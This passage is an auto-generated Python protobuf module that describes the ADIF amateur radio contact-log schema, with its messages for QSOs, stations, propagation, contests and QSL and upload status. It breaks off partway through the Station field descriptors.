_sym_db = _symbol_database.Default()
from google.protobuf import timestamp_pb2 as google_dot_protobuf_dot_timestamp__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='adif.proto',
package='adif',
syntax='proto3',
serialized_options=b'Z\010.;adifpb',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\nadif.proto\x12\x04\x61\x64if\x1a\x1fgoogle/protobuf/timestamp.proto\"=\n\x04\x41\x64if\x12\x1c\n\x06header\x18\x01 \x01(\x0b\x32\x0c.adif.Header\x12\x17\n\x04qsos\x18\x02 \x03(\x0b\x32\t.adif.Qso\"\x82\x01\n\x06Header\x12\x14\n\x0c\x61\x64if_version\x18\x01 \x01(\t\x12\x35\n\x11\x63reated_timestamp\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x12\n\nprogram_id\x18\x03 \x01(\t\x12\x17\n\x0fprogram_version\x18\x04 \x01(\t\"\x82\x07\n\x03Qso\x12&\n\x0flogging_station\x18\x01 \x01(\x0b\x32\r.adif.Station\x12(\n\x11\x63ontacted_station\x18\x02 \x01(\x0b\x32\r.adif.Station\x12&\n\x0bpropagation\x18\x03 \x01(\x0b\x32\x11.adif.Propagation\x12\x0c\n\x04\x62\x61nd\x18\x04 \x01(\t\x12\x0f\n\x07\x62\x61nd_rx\x18\x05 \x01(\t\x12\x0c\n\x04\x66req\x18\x06 \x01(\x01\x12\x0f\n\x07\x66req_rx\x18\x07 \x01(\x01\x12\x0c\n\x04mode\x18\x08 \x01(\t\x12\x0f\n\x07submode\x18\t \x01(\t\x12\x13\n\x0b\x64istance_km\x18\n \x01(\r\x12+\n\x07time_on\x18\x0b \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12,\n\x08time_off\x18\x0c \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x0e\n\x06random\x18\r \x01(\x08\x12\x14\n\x0crst_received\x18\x0e \x01(\t\x12\x10\n\x08rst_sent\x18\x0f \x01(\t\x12\x0b\n\x03swl\x18\x10 \x01(\x08\x12\x10\n\x08\x63omplete\x18\x11 \x01(\t\x12\x0f\n\x07\x63omment\x18\x12 \x01(\t\x12\r\n\x05notes\x18\x13 \x01(\t\x12\"\n\x07\x63ontest\x18\x14 \x01(\x0b\x32\x11.adif.ContestData\x12\x17\n\x0f\x61ward_submitted\x18\x15 \x03(\t\x12\x15\n\raward_granted\x18\x16 \x03(\t\x12&\n\x10\x63redit_submitted\x18\x17 \x03(\x0b\x32\x0c.adif.Credit\x12$\n\x0e\x63redit_granted\x18\x18 \x03(\x0b\x32\x0c.adif.Credit\x12\x12\n\npublic_key\x18\x19 \x01(\t\x12\x1d\n\x07\x63lublog\x18\x1a \x01(\x0b\x32\x0c.adif.Upload\x12\x1c\n\x06hrdlog\x18\x1b \x01(\x0b\x32\x0c.adif.Upload\x12\x1c\n\x06qrzcom\x18\x1c \x01(\x0b\x32\x0c.adif.Upload\x12\x17\n\x04\x65qsl\x18\x1d \x01(\x0b\x32\t.adif.Qsl\x12\x17\n\x04lotw\x18\x1e \x01(\x0b\x32\t.adif.Qsl\x12\x17\n\x04\x63\x61rd\x18\x1f 
\x01(\x0b\x32\t.adif.Qsl\x12.\n\x0b\x61pp_defined\x18 \x03(\x0b\x32\x19.adif.Qso.AppDefinedEntry\x1a\x31\n\x0f\x41ppDefinedEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xf7\x05\n\x07Station\x12\x0f\n\x07op_call\x18\x01 \x01(\t\x12\x0f\n\x07op_name\x18\x02 \x01(\t\x12\x13\n\x0bgrid_square\x18\x03 \x01(\t\x12\x10\n\x08latitude\x18\x04 \x01(\x01\x12\x11\n\tlongitude\x18\x05 \x01(\x01\x12\r\n\x05power\x18\x06 \x01(\x01\x12\x0b\n\x03rig\x18\x07 \x01(\t\x12\x0f\n\x07\x61ntenna\x18\x08 \x01(\t\x12\x17\n\x0f\x61ntenna_azimuth\x18\t \x01(\x05\x12\x19\n\x11\x61ntenna_elevation\x18\n \x01(\x05\x12\x12\n\nowner_call\x18\x0b \x01(\t\x12\x14\n\x0cstation_call\x18\x0c \x01(\t\x12\x0b\n\x03\x61ge\x18\r \x01(\r\x12\x12\n\nsilent_key\x18\x0e \x01(\x08\x12\x0f\n\x07qsl_via\x18\x0f \x01(\t\x12\x0f\n\x07\x61\x64\x64ress\x18\x10 \x01(\t\x12\x0e\n\x06street\x18\x11 \x01(\t\x12\x0c\n\x04\x63ity\x18\x12 \x01(\t\x12\x13\n\x0bpostal_code\x18\x13 \x01(\t\x12\x0e\n\x06\x63ounty\x18\x14 \x01(\t\x12\r\n\x05state\x18\x15 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x16 \x01(\t\x12\x0c\n\x04\x64xcc\x18\x17 \x01(\r\x12\x11\n\tcontinent\x18\x18 \x01(\t\x12\r\n\x05\x65mail\x18\x19 \x01(\t\x12\x0b\n\x03web\x18\x1a \x01(\t\x12\x0f\n\x07\x63q_zone\x18\x1b \x01(\r\x12\x10\n\x08itu_zone\x18\x1c \x01(\r\x12\x10\n\x08\x64\x61rc_dok\x18\x1d \x01(\t\x12\r\n\x05\x66ists\x18\x1e \x01(\r\x12\x10\n\x08\x66ists_cc\x18\x1f \x01(\r\x12\x0c\n\x04iota\x18 \x01(\t\x12\x16\n\x0eiota_island_id\x18! 
\x01(\r\x12\x0b\n\x03pfx\x18\" \x01(\t\x12\x0e\n\x06region\x18# \x01(\t\x12\x0c\n\x04skcc\x18$ \x01(\t\x12\x0b\n\x03sig\x18% \x01(\t\x12\x10\n\x08sig_info\x18& \x01(\t\x12\x10\n\x08sota_ref\x18\' \x01(\t\x12\x0f\n\x07ten_ten\x18( \x01(\r\x12\x16\n\x0eusaca_counties\x18) \x01(\t\x12\r\n\x05uksmg\x18* \x01(\r\x12\x12\n\nvucc_grids\x18+ \x01(\t\"\x82\x02\n\x0bPropagation\x12\x18\n\x10propagation_mode\x18\x01 \x01(\t\x12\x0f\n\x07\x61_index\x18\x02 \x01(\r\x12\x0f\n\x07k_index\x18\x03 \x01(\r\x12\x18\n\x10solar_flux_index\x18\x04 \x01(\r\x12\x10\n\x08\x61nt_path\x18\x05 \x01(\t\x12\x12\n\nforce_init\x18\x06 \x01(\x08\x12\x12\n\nmax_bursts\x18\x07 \x01(\r\x12\x1a\n\x12meteor_shower_name\x18\x08 \x01(\t\x12\x11\n\tnr_bursts\x18\x0b \x01(\r\x12\x10\n\x08nr_pings\x18\x0c \x01(\r\x12\x10\n\x08sat_mode\x18\t \x01(\t\x12\x10\n\x08sat_name\x18\n \x01(\t\"\x9f\x01\n\x0b\x43ontestData\x12\x12\n\ncontest_id\x18\x01 \x01(\t\x12\x13\n\x0bserial_sent\x18\x02 \x01(\t\x12\x17\n\x0fserial_received\x18\x03 \x01(\t\x12\x14\n\x0c\x61rrl_section\x18\x04 \x01(\t\x12\x15\n\rstation_class\x18\x05 \x01(\t\x12\r\n\x05\x63heck\x18\x06 \x01(\t\x12\x12\n\nprecedence\x18\x07 \x01(\t\",\n\x06\x43redit\x12\x0e\n\x06\x63redit\x18\x01 \x01(\t\x12\x12\n\nqsl_medium\x18\x02 \x01(\t\"d\n\x06Upload\x12/\n\x0bupload_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12)\n\rupload_status\x18\x02 \x01(\x0e\x32\x12.adif.UploadStatus\"\xd7\x01\n\x03Qsl\x12-\n\tsent_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x13\n\x0bsent_status\x18\x02 \x01(\t\x12\x10\n\x08sent_via\x18\x03 \x01(\t\x12\x31\n\rreceived_date\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x17\n\x0freceived_status\x18\x05 \x01(\t\x12\x14\n\x0creceived_via\x18\x06 \x01(\t\x12\x18\n\x10received_message\x18\x07 \x01(\t*^\n\x0cUploadStatus\x12\x0b\n\x07UNKNOWN\x10\x00\x12\x13\n\x0fUPLOAD_COMPLETE\x10\x01\x12\x11\n\rDO_NOT_UPLOAD\x10\x02\x12\x19\n\x15MODIFIED_AFTER_UPLOAD\x10\x03\x42\nZ\x08.;adifpbb\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,])
_UPLOADSTATUS = _descriptor.EnumDescriptor(
name='UploadStatus',
full_name='adif.UploadStatus',
filename=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
values=[
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=0, number=0,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UPLOAD_COMPLETE', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='DO_NOT_UPLOAD', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='MODIFIED_AFTER_UPLOAD', index=3, number=3,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=2701,
serialized_end=2795,
)
_sym_db.RegisterEnumDescriptor(_UPLOADSTATUS)
UploadStatus = enum_type_wrapper.EnumTypeWrapper(_UPLOADSTATUS)
UNKNOWN = 0
UPLOAD_COMPLETE = 1
DO_NOT_UPLOAD = 2
MODIFIED_AFTER_UPLOAD = 3
_ADIF = _descriptor.Descriptor(
name='Adif',
full_name='adif.Adif',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='header', full_name='adif.Adif.header', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qsos', full_name='adif.Adif.qsos', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=53,
serialized_end=114,
)
_HEADER = _descriptor.Descriptor(
name='Header',
full_name='adif.Header',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='adif_version', full_name='adif.Header.adif_version', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='created_timestamp', full_name='adif.Header.created_timestamp', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='program_id', full_name='adif.Header.program_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='program_version', full_name='adif.Header.program_version', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=117,
serialized_end=247,
)
_QSO_APPDEFINEDENTRY = _descriptor.Descriptor(
name='AppDefinedEntry',
full_name='adif.Qso.AppDefinedEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='adif.Qso.AppDefinedEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='adif.Qso.AppDefinedEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1099,
serialized_end=1148,
)
_QSO = _descriptor.Descriptor(
name='Qso',
full_name='adif.Qso',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='logging_station', full_name='adif.Qso.logging_station', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contacted_station', full_name='adif.Qso.contacted_station', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='propagation', full_name='adif.Qso.propagation', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='band', full_name='adif.Qso.band', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='band_rx', full_name='adif.Qso.band_rx', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='freq', full_name='adif.Qso.freq', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='freq_rx', full_name='adif.Qso.freq_rx', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mode', full_name='adif.Qso.mode', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='submode', full_name='adif.Qso.submode', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='distance_km', full_name='adif.Qso.distance_km', index=9,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time_on', full_name='adif.Qso.time_on', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time_off', full_name='adif.Qso.time_off', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random', full_name='adif.Qso.random', index=12,
number=13, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rst_received', full_name='adif.Qso.rst_received', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rst_sent', full_name='adif.Qso.rst_sent', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='swl', full_name='adif.Qso.swl', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='complete', full_name='adif.Qso.complete', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='comment', full_name='adif.Qso.comment', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='notes', full_name='adif.Qso.notes', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contest', full_name='adif.Qso.contest', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='award_submitted', full_name='adif.Qso.award_submitted', index=20,
number=21, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='award_granted', full_name='adif.Qso.award_granted', index=21,
number=22, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='credit_submitted', full_name='adif.Qso.credit_submitted', index=22,
number=23, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='credit_granted', full_name='adif.Qso.credit_granted', index=23,
number=24, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='public_key', full_name='adif.Qso.public_key', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='clublog', full_name='adif.Qso.clublog', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hrdlog', full_name='adif.Qso.hrdlog', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qrzcom', full_name='adif.Qso.qrzcom', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='eqsl', full_name='adif.Qso.eqsl', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lotw', full_name='adif.Qso.lotw', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='card', full_name='adif.Qso.card', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='app_defined', full_name='adif.Qso.app_defined', index=31,
number=32, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_QSO_APPDEFINEDENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=250,
serialized_end=1148,
)
_STATION = _descriptor.Descriptor(
name='Station',
full_name='adif.Station',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='op_call', full_name='adif.Station.op_call', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='op_name', full_name='adif.Station.op_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='grid_square', full_name='adif.Station.grid_square', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='latitude', full_name='adif.Station.latitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='longitude', full_name='adif.Station.longitude', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='power', full_name='adif.Station.power', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rig', full_name='adif.Station.rig', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna', full_name='adif.Station.antenna', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna_azimuth', full_name='adif.Station.antenna_azimuth', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna_elevation', full_name='adif.Station.antenna_elevation', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='owner_call', full_name='adif.Station.owner_call', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='station_call', full_name='adif.Station.station_call', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='age', full_name='adif.Station.age', index=12,
number=13, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='silent_key', full_name='adif.Station.silent_key', index=13,
number=14, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qsl_via', full_name='adif.Station.qsl_via', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='adif.Station.address', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='street', full_name='adif.Station.street', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='city', full_name='adif.Station.city', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='postal_code', full_name='adif.Station.postal_code', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
